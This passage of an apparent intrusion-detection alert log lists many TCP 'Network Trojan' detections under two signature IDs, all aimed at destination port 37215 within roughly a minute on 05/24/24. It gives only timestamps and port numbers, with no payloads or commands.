              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.456834
              SID:2829579
              Source Port:39454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.266415
              SID:2835222
              Source Port:59950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.522590
              SID:2835222
              Source Port:35960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188789
              SID:2829579
              Source Port:34722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.149103
              SID:2829579
              Source Port:60010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.866374
              SID:2829579
              Source Port:37546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.113754
              SID:2829579
              Source Port:44646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.119813
              SID:2829579
              Source Port:37312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.411754
              SID:2829579
              Source Port:47560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.282279
              SID:2835222
              Source Port:33894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103308
              SID:2835222
              Source Port:45672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.423399
              SID:2829579
              Source Port:57470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.481185
              SID:2835222
              Source Port:52130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.443966
              SID:2835222
              Source Port:44964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.358894
              SID:2835222
              Source Port:35272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663560
              SID:2835222
              Source Port:53864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.444725
              SID:2829579
              Source Port:52062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.472912
              SID:2835222
              Source Port:54230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724909
              SID:2835222
              Source Port:57336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.505838
              SID:2829579
              Source Port:53738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.866345
              SID:2835222
              Source Port:41622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.747681
              SID:2829579
              Source Port:55880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.070200
              SID:2835222
              Source Port:55826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.535516
              SID:2835222
              Source Port:56656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.924325
              SID:2835222
              Source Port:37120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.231826
              SID:2835222
              Source Port:36024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857113
              SID:2835222
              Source Port:57986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.520283
              SID:2829579
              Source Port:36920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.114679
              SID:2835222
              Source Port:53158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433769
              SID:2835222
              Source Port:55522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623905
              SID:2829579
              Source Port:37528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.431394
              SID:2835222
              Source Port:45232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926854
              SID:2835222
              Source Port:55636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.538684
              SID:2829579
              Source Port:55488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661263
              SID:2835222
              Source Port:49160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.300026
              SID:2829579
              Source Port:54632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.197330
              SID:2829579
              Source Port:57568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.197977
              SID:2835222
              Source Port:35914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575080
              SID:2829579
              Source Port:55064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.584773
              SID:2829579
              Source Port:44912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395727
              SID:2829579
              Source Port:56210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.598127
              SID:2829579
              Source Port:41830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.693202
              SID:2829579
              Source Port:41260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.698370
              SID:2835222
              Source Port:53256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574107
              SID:2829579
              Source Port:38352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061230
              SID:2829579
              Source Port:45310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.535948
              SID:2829579
              Source Port:38006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.536428
              SID:2835222
              Source Port:47920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.299981
              SID:2835222
              Source Port:39554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.868610
              SID:2835222
              Source Port:54748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.103610
              SID:2835222
              Source Port:43172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.231726
              SID:2829579
              Source Port:33988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.491743
              SID:2835222
              Source Port:54236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.431391
              SID:2835222
              Source Port:47386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.513383
              SID:2835222
              Source Port:54574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.448796
              SID:2835222
              Source Port:49924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.828662
              SID:2829579
              Source Port:51790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.516295
              SID:2829579
              Source Port:47442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099677
              SID:2835222
              Source Port:51738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.202799
              SID:2829579
              Source Port:45698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.554347
              SID:2829579
              Source Port:57158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.701011
              SID:2829579
              Source Port:45378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.972355
              SID:2835222
              Source Port:42110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.362313
              SID:2829579
              Source Port:53102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.741811
              SID:2835222
              Source Port:40420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.621579
              SID:2829579
              Source Port:44570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.247697
              SID:2829579
              Source Port:55824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.208915
              SID:2829579
              Source Port:55074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.232429
              SID:2835222
              Source Port:40922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.101616
              SID:2835222
              Source Port:43026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.401463
              SID:2829579
              Source Port:51424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.391626
              SID:2835222
              Source Port:36988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.553716
              SID:2829579
              Source Port:57340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.988610
              SID:2835222
              Source Port:36650
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.474607
              SID:2835222
              Source Port:33168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.518584
              SID:2835222
              Source Port:48574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.481138
              SID:2829579
              Source Port:38262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395158
              SID:2835222
              Source Port:51030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.816112
              SID:2835222
              Source Port:59570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.970604
              SID:2835222
              Source Port:38514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.154316
              SID:2835222
              Source Port:33860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.287835
              SID:2829579
              Source Port:44620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.868556
              SID:2835222
              Source Port:42336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.162264
              SID:2835222
              Source Port:40598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.856910
              SID:2835222
              Source Port:51830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.774337
              SID:2835222
              Source Port:46680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.300087
              SID:2829579
              Source Port:47014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.761858
              SID:2835222
              Source Port:48944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.700866
              SID:2835222
              Source Port:53040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.519423
              SID:2835222
              Source Port:41344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.208272
              SID:2829579
              Source Port:35236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.358623
              SID:2835222
              Source Port:56184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.878218
              SID:2835222
              Source Port:34238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098214
              SID:2829579
              Source Port:51520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.579523
              SID:2835222
              Source Port:51772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536385
              SID:2835222
              Source Port:54434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.542350
              SID:2829579
              Source Port:33808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.284800
              SID:2835222
              Source Port:47886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.582530
              SID:2835222
              Source Port:48336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.456942
              SID:2835222
              Source Port:60442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.503652
              SID:2835222
              Source Port:51292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.981144
              SID:2829579
              Source Port:52120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432280
              SID:2835222
              Source Port:47032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.441921
              SID:2829579
              Source Port:42932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.078089
              SID:2835222
              Source Port:57930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.203339
              SID:2829579
              Source Port:37154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.798968
              SID:2829579
              Source Port:51782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061445
              SID:2829579
              Source Port:57118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.485010
              SID:2829579
              Source Port:35962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.287796
              SID:2835222
              Source Port:53462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.875802
              SID:2835222
              Source Port:52448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.267785
              SID:2829579
              Source Port:37122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537647
              SID:2829579
              Source Port:40638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188102
              SID:2829579
              Source Port:54600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.535951
              SID:2829579
              Source Port:35020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.878352
              SID:2835222
              Source Port:52126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.796382
              SID:2835222
              Source Port:50640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.431278
              SID:2835222
              Source Port:35382
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.460525
              SID:2829579
              Source Port:58720
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.044629
              SID:2829579
              Source Port:48160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329717
              SID:2835222
              Source Port:46874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.477271
              SID:2829579
              Source Port:60288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575404
              SID:2829579
              Source Port:42124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.199830
              SID:2829579
              Source Port:51186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.280905
              SID:2835222
              Source Port:34424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.705416
              SID:2829579
              Source Port:33914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.154085
              SID:2835222
              Source Port:47626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.202846
              SID:2829579
              Source Port:54592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.635669
              SID:2829579
              Source Port:44218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.340875
              SID:2829579
              Source Port:56562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.343039
              SID:2835222
              Source Port:47656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.814707
              SID:2829579
              Source Port:42522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397908
              SID:2829579
              Source Port:50138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.365271
              SID:2829579
              Source Port:34030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.599212
              SID:2835222
              Source Port:52290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.404323
              SID:2829579
              Source Port:54016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.598050
              SID:2835222
              Source Port:53618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.694618
              SID:2835222
              Source Port:37316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.766425
              SID:2835222
              Source Port:50110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.481893
              SID:2835222
              Source Port:42728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.928737
              SID:2835222
              Source Port:56468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.411472
              SID:2829579
              Source Port:56522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.334252
              SID:2835222
              Source Port:41502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.826834
              SID:2829579
              Source Port:54166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.604804
              SID:2829579
              Source Port:52002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.120818
              SID:2835222
              Source Port:36028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.102303
              SID:2829579
              Source Port:32918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.799242
              SID:2829579
              Source Port:39376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433494
              SID:2835222
              Source Port:37778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.860102
              SID:2835222
              Source Port:42998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.630773
              SID:2829579
              Source Port:52092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.878012
              SID:2829579
              Source Port:38310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.430719
              SID:2835222
              Source Port:53276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.796614
              SID:2829579
              Source Port:33986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.664544
              SID:2835222
              Source Port:40922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.065820
              SID:2835222
              Source Port:48080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.383353
              SID:2829579
              Source Port:35678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100724
              SID:2829579
              Source Port:56196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.504465
              SID:2835222
              Source Port:43072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.044314
              SID:2829579
              Source Port:43884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.040498
              SID:2835222
              Source Port:52564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.365204
              SID:2835222
              Source Port:41160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.411730
              SID:2829579
              Source Port:37148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396759
              SID:2829579
              Source Port:47592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.538186
              SID:2829579
              Source Port:51060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.282299
              SID:2835222
              Source Port:40860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.346983
              SID:2835222
              Source Port:44822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116640
              SID:2835222
              Source Port:47484
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.189030
              SID:2835222
              Source Port:51004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.232569
              SID:2835222
              Source Port:39504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.053899
              SID:2835222
              Source Port:49060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.445082
              SID:2835222
              Source Port:60198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.303206
              SID:2829579
              Source Port:39738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.333983
              SID:2829579
              Source Port:33970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341404
              SID:2835222
              Source Port:55678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.435324
              SID:2835222
              Source Port:34184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.063828
              SID:2835222
              Source Port:49230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.526927
              SID:2835222
              Source Port:45670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.269381
              SID:2829579
              Source Port:38054
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.492451
              SID:2829579
              Source Port:44420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.125459
              SID:2835222
              Source Port:55342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.198027
              SID:2835222
              Source Port:58218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.595006
              SID:2829579
              Source Port:47944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.817904
              SID:2829579
              Source Port:48896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.970787
              SID:2835222
              Source Port:40130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.150549
              SID:2829579
              Source Port:57468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.923741
              SID:2835222
              Source Port:47644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.235547
              SID:2835222
              Source Port:45212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103155
              SID:2829579
              Source Port:56542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.579498
              SID:2835222
              Source Port:48266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.804684
              SID:2835222
              Source Port:47648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.148819
              SID:2835222
              Source Port:44322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.639475
              SID:2835222
              Source Port:40056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186980
              SID:2829579
              Source Port:48164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482096
              SID:2835222
              Source Port:37968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.111187
              SID:2829579
              Source Port:47654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100804
              SID:2829579
              Source Port:55980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
